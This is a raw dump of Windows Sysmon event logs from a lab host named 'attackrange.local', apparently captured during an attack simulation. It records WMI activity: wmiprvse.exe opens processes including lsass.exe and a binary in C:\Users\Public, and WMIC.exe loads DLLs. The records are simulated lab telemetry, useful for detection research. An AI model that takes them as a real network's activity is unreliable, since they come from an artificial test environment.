12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8872-6164-2100-00000000F101}2476C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349746Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8872-6164-2000-00000000F101}2468C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349745Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886E-6164-1F00-00000000F101}2136C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349744Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886E-6164-1700-00000000F101}1408C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349743Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349742Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886E-6164-1500-00000000F101}1252C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349741Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886D-6164-1400-00000000F101}1068C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349740Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886D-6164-1300-00000000F101}1040C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349739Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886D-6164-1200-00000000F101}460C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349738Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886D-6164-1100-00000000F101}420C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349737Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886D-6164-1000-00000000F101}452C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349736Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886D-6164-0F00-00000000F101}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349735Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886D-6164-0E00-00000000F101}1000C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349734Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886D-6164-0D00-00000000F101}904C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349733Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886D-6164-0C00-00000000F101}848C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349732Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.727{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349731Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.711{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8869-6164-0900-00000000F101}588C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 734700x800000000000000057349730Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.711{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\wmiutils.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwmiutils.dllMD5=5179B0DEF3AB5CAC3BA02316AF1B6B40,SHA256=FA4112CB0D1A133C41FD001F958F0BE930BB49072BF97A3D765AEA8DB841ABC4trueMicrosoft WindowsValid 734700x800000000000000057349729Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.711{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\fastprox.dll10.0.14393.0 (rs1_release.160715-1616)WMI Custom MarshallerMicrosoft® Windows® Operating SystemMicrosoft Corporationfastprox.dllMD5=C2F7834269D565263C65757EDE37A66C,SHA256=17651A35255229CE95F065CA1BCCC4867B43DA879D72AFCC91FBA4768225C7D3trueMicrosoft WindowsValid 734700x800000000000000057349728Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.711{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\wbemsvc.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemsvc.dllMD5=2BE97028B7B85762561F475E31989C2A,SHA256=75C9D8C6D41B4B7D70666A8107A08A748CEF6CB9E60AD0288B10CDE12E274AFFtrueMicrosoft WindowsValid 734700x800000000000000057349727Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.707{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\msvcr100.dll10.00.40219.1Microsoft® C Runtime LibraryMicrosoft® Visual Studio® 2010Microsoft Corporationmsvcr100_clr0400.dllMD5=DF3CA8D16BDED6A54977B30E66864D33,SHA256=1D1A1AE540BA132F998D60D3622F0297B6E86AE399332C3B47462D7C0F560A36trueMicrosoft CorporationValid 734700x800000000000000057349726Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.707{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL15.0.4569.1503Microsoft Office XML MIME FilterMicrosoft Office InfoPathMicrosoft Corporationmsoxmlmf.dllMD5=B5EDAEFD10131A8CBF234565B94F172A,SHA256=738E134837092E5A84A43096CA2C1A0BD87C16B6F14670E4F64B0EE65ACCACC8trueMicrosoft CorporationValid 734700x800000000000000057349725Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=74621C6ABE4E9A568DF0A38E7282D71E,SHA256=0788A092D47800D0EB120A7DBB9E59234D0722A4A2E80ECE6CE70E3A84A3750AtrueMicrosoft WindowsValid 10341000x800000000000000057349724Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-886E-6164-1600-00000000F101}13169500C:\Windows\System32\svchost.exe{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057349723Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-886E-6164-1600-00000000F101}13161348C:\Windows\System32\svchost.exe{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\Wbem\WMIC.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057349722Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.690{8B6011A9-5BAC-618E-61F3-04000000F101}8044C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft 